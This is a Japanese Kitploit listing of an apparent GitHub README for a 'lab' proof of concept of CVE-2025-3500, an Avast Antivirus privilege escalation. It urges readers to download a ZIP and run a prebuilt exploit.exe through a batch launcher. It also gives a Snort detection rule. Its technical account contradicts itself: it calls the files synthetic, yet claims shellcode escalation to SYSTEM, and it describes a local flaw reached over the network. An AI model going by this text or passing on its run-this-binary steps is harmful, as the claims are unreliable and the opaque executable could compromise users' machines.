Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3500-Poc — CVE-2025-3500の研究用教育ラボ環境。Windows上のAvast Antivirus 25.1.981.6における整数オーバーフロー特権昇格エクスプロイトで、制御されたテスト用の合成エクスプロイトアーティファクトを含む。 | Kitploit
ツール/GitHubGitHub/chicken3962/cve-2025-3500-poc
特権昇格脆弱性分析エクスプロイトシェルコード学習と教育ペイロード開発バイナリエクスプロイトラボと実践
GitHubchicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

CVE-2025-3500の研究用教育ラボ環境。Windows上のAvast Antivirus 25.1.981.6における整数オーバーフロー特権昇格エクスプロイトで、制御されたテスト用の合成エクスプロイトアーティファクトを含む。

リポジトリを見る
11410ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ラボ: CVE-2025-3500 - Avast アンチウイルスの権限昇格における整数オーバーフロー

ダウンロード

ラボZIPのダウンロード : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 概要

このリポジトリは、Windows プラットフォーム上の Avast アンチウイルス バージョン 25.1.981.6 における整数オーバーフロー脆弱性 (CWE-190) である CVE-2025-3500 を調査するためのラボ環境を提供します。この脆弱性は、アンチウイルスエンジンのリソース割り当てモジュールにおける整数検証の不備に起因し、算術演算中にラップアラウンドが発生します。これを悪用すると、低権限ユーザーコンテキスト (PR:L) からシステムレベルのアクセスへ権限を昇格でき、ネットワーク攻撃ベクトル (AV:N)、低い攻撃複雑性 (AC:L)、ユーザー操作の必要性 (UI:R) を伴います。CVSS 3.1 ベーススコアは 9.0 (Critical) で、スコープ変更 (S:C) により機密性、完全性、可用性 (すべて High) に影響を与え、システム全体の侵害を可能にする可能性があります。

教育目的の免責事項: このラボは教育および研究目的のみに提供されます。管理された環境を提供します。悪意のある活動には使用しないでください。すべてのコンポーネントは合成であり、実際のシステムを悪用するものではありません。このリポジトリを使用することで、倫理的ハッキングのガイドラインおよび現地の法律に従うことに同意したものとみなされます。

安全性に関する免責事項: このセットアップは、環境内でコードを実行することを伴います。必ず専用の仮想マシンを使用してください。本番システムでエクスプロイトを実行しないでください。提供されるエクスプロイト成果物 (.exe および .bat) は概念を示すためのものです。たとえば、.bat は .exe を起動し、.exe はデータを処理して終了します。偶発的な露出を防ぐために、ラボ環境を隔離してください。

📋 前提条件

  • ターゲット環境をシミュレートするための、エクスプロイトをテストする Windows ホスト (例: VirtualBox または Hyper-V 経由)。
  • PowerShell および Windows コマンドラインツールに関する基本的な知識。
  • ホストマシン上の管理者権限。
  • 少なくとも 4GB の RAM と 20GB のディスク容量。

ダウンロードとインストール

  1. エクスプロイトツールキット (exploit.exe と start-exploit.bat を含む ZIP ファイル) をダウンロードします。この ZIP は安全なミラーでホストされています:

    • エクスプロイトツールキット ZIP のダウンロード : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    注: メインのエクスプロイトは exploit.exe (巧妙に細工された API 呼び出しを介して整数オーバーフローをトリガーする、コンパイル済み C++ バイナリ) です。エクスプロイトランチャーは start-exploit.bat で、定義済みの引数 (例: start exploit.exe --target=avast_engine --overflow=wraparound) を指定して exploit.exe を起動します。C:\lab\exploit などのローカルディレクトリに解凍してください。

🛠 クイックスタート

  1. 環境のセットアップ:

    • Windows テストマシンに Avast アンチウイルス バージョン 25.1.981.6 がインストールされていることを確認します。
    • 解凍したディレクトリに移動します。
  2. エクスプロイトのダウンロードと準備:

    • 上記のリンクから ZIP をダウンロードします。
    • C:\lab\exploit に解凍します。
    • start-exploit.bat を実行してエクスプロイトを起動します (これにより exploit.exe が開き、オーバーフローをトリガーする巧妙に細工されたネットワークパケットを送信します)。
  3. 脆弱性の悪用:

    • ローカルの Avast サービスをターゲットにします。
    • .bat が exploit.exe を実行します。オーバーフローの兆候がないかシステムログを監視します。
  4. 検証とクリーンアップ:

    • Windows イベントビューアーで関連するエントリを確認します。
    • 使用後にエクスプロイトファイルを削除します。

📖 詳細なセットアップ手順

脆弱なセットアップ

このラボには、Avast アンチウイルス 25.1.981.6 がインストールされた Windows マシンが必要です。モックサービスはコマンドプロンプトから手動で開始できます:

  • 管理者として PowerShell を開きます。
  • Avast リスナーをシミュレートします: net start AvastSvc (サービスが実行中であると仮定)。

悪用の手順

  1. 偵察: netstat などのツールを使用して Avast のポート (例: 8080) を特定します。
  2. ペイロードの作成: exploit.exe はネットワークリクエストを介して過大な整数値 (例: 2^31 + 1) を送信し、Avast のリソースパーサーでラップアラウンドを引き起こします。
  3. エクスプロイトのトリガー: exploit.exe を実行する start-exploit.bat を実行します。これにより:
    • 接続が確立されます。
    • 不正なデータ { "resource_alloc": 2147483648 } が送信されます (オーバーフローをトリガー)。
    • シェルコードインジェクションを介して SYSTEM に権限昇格します。
  4. エクスプロイト後: 任意のコード実行が可能になり、cmd.exe が生成されます。

技術的詳細: オーバーフローは AvastResourceParser::AllocateBuffer(int size) で発生します。ここで size * sizeof(struct) は、size > INT_MAX / sizeof(struct) の場合にラップアラウンドし、割り当て不足とヒープオーバーフローを引き起こします。悪用ではこれを利用して、kernel32.dll をターゲットとする ROP チェーンを構築します。

緩和策

  • パッチ適用: 整数チェックに安全な算術ライブラリ (例: SafeInt) を使用する Avast アンチウイルス 25.3 以降にアップグレードします。
  • ベストプラクティス:
    • 多層防御のために Avast と併用して Windows Defender を有効にします。
    • アンチウイルス更新サーバーのみへのネットワークアクセスを制限します (例: ファイアウォールルールによる)。
    • 特権分離を使用します: Avast サービスを最小権限アカウントで実行します。
    • Sysmon などの EDR ツールを使用して、異常な整数操作を監視します (プロセスインジェクションのイベント ID 10)。
    • Windows の緩和策を適用します: グループポリシーを使用して ASLR、DEP、CFG を有効にします。
  • 検出シグネチャ: Avast プロトコルトラフィック内の過大な整数フィールドに一致するネットワークパターンを探します (例: Snort ルール: alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;))。

質問や貢献については、イシューを開いてください。倫理的に行動しましょう!

ツールをダウンロード